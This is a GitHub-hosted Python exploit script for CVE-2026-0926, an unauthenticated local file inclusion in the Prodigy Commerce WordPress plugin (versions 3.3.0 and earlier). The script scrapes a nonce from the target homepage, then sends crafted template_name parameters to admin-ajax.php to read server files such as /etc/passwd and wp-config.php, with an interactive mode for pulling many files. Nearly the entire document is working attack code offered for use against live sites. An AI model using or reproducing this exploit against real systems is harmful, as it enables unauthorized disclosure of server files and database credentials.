-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathCVE-2026-0926.py
More file actions
189 lines (155 loc) · 6.32 KB
/
CVE-2026-0926.py
File metadata and controls
189 lines (155 loc) · 6.32 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
#!/usr/bin/env python3
"""
[*] CVE-2026-0926 - Prodigy Commerce <= 3.3.0 Local File Inclusion
[*] Vulnerability: LFI via parameters[template_name] in prodigy-render-my-account-widget
[*] CVSS: 9.8 (Critical) | CWE-98: Improper Control of Generation of Code
[*] Made By Fsociety
"""
import requests
import argparse
import sys
import re
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Banner
def banner():
print(r"""
╔════════════════════════════════════════════════╗
║ CVE-2026-0926 Exploit - Prodigy Commerce LFI ║
║ WordPress Plugin <= 3.3.0 ║
║ Unauthenticated Local File Inclusion ║
║ Made By Fsociety ║
╚════════════════════════════════════════════════╝
""")
def extract_nonce(target, verify=False):
"""Extract nonce value from homepage JavaScript"""
print(f"[+] Fetching homepage to extract nonce...")
try:
resp = requests.get(target.rstrip('/'), verify=verify, timeout=10)
if resp.status_code != 200:
print(f"[-] Failed to fetch homepage: HTTP {resp.status_code}")
return None
# Pattern: var settings = {..."nonce":"[hex]"}
match = re.search(r'var settings\s*=\s*\{[^}]*"nonce"\s*:\s*"([a-f0-9]+)"', resp.text, re.DOTALL)
if match:
nonce = match.group(1)
print(f"[+] Nonce extracted: {nonce}")
return nonce
else:
print("[-] Could not find nonce in page source")
return None
except requests.exceptions.RequestException as e:
print(f"[-] Connection error: {e}")
return None
def exploit_lfi(target, file_path, nonce, verify=False):
"""
Exploit CVE-2026-0926: Local File Inclusion via template_name parameter
Args:
target: WordPress site URL
file_path: Path to include (e.g., 'etc/passwd')
nonce: CSRF nonce from homepage
verify: Verify SSL certificates
"""
ajax_url = f"{target.rstrip('/')}/wp-admin/admin-ajax.php"
# Form-encoded payload
payload = {
"action": "prodigy-render-my-account-widget",
"nonce": nonce,
"parameters[template_name]": file_path,
"parameters[default_path]": "/"
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
print(f"[+] Requesting file: /{file_path}")
try:
resp = requests.post(
ajax_url,
data=payload,
headers=headers,
verify=verify,
timeout=15
)
if resp.status_code == 200:
body = resp.text.strip()
# Check for known file patterns
if "root:x:0:0:" in body or "root:.*:0:0:" in body:
print("[✓] LFI successful! File contents:")
print("-" * 60)
print(body)
print("-" * 60)
return True
elif len(body) > 50 and "<!DOCTYPE" not in body and "<html" not in body.lower():
# Likely file content (not HTML error page)
print("[✓] Response received (possible file content):")
print("-" * 60)
print(body[:2000]) # Limit output
print("-" * 60 if len(body) > 2000 else "")
return True
else:
print(f"[-] Unexpected response (HTML or error):")
print(body[:300])
return False
else:
print(f"[-] HTTP {resp.status_code}: {resp.text[:200]}")
return False
except requests.exceptions.RequestException as e:
print(f"[-] Error: {e}")
return False
def interactive_lfi(target, nonce, verify=False):
"""Interactive mode for reading multiple files"""
print("[*] Interactive LFI mode (type 'quit' to exit)")
print("[*] Try: etc/passwd, wp-config.php, ../../../etc/passwd")
while True:
try:
path = input("\n[file]> ").strip()
if path.lower() in ['quit', 'exit', 'q']:
print("[+] Exiting...")
break
if not path:
continue
exploit_lfi(target, path, nonce, verify)
except KeyboardInterrupt:
print("\n[+] Interrupted")
break
except EOFError:
break
def main():
banner()
parser = argparse.ArgumentParser(
description="CVE-2026-0926: Prodigy Commerce LFI Exploit",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -t http://target.com -f etc/passwd
%(prog)s -t http://target.com -f wp-config.php
%(prog)s -t http://target.com --interactive
%(prog)s -t https://target.com -f etc/passwd -k
"""
)
parser.add_argument("-t", "--target", required=True, help="Target WordPress URL")
parser.add_argument("-f", "--file", help="File path to include (e.g., etc/passwd)")
parser.add_argument("--interactive", action="store_true", help="Interactive file reading mode")
parser.add_argument("-k", "--insecure", action="store_true", help="Disable SSL verification")
parser.add_argument("-n", "--nonce", help="Manually provide nonce (skip extraction)")
args = parser.parse_args()
verify = not args.insecure
# Get nonce
nonce = args.nonce if args.nonce else extract_nonce(args.target, verify)
if not nonce:
print("[-] Failed to obtain nonce. Try manual extraction with -n flag")
sys.exit(1)
# Interactive mode
if args.interactive:
interactive_lfi(args.target, nonce, verify)
# Single file mode
elif args.file:
exploit_lfi(args.target, args.file, nonce, verify)
else:
print("[!] Use -f/--file to specify a file or --interactive for mode")
print("[!] Example: python3 CVE-2026-0926.py -t http://target.com -f etc/passwd")
sys.exit(1)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[!] Interrupted by user")
sys.exit(130)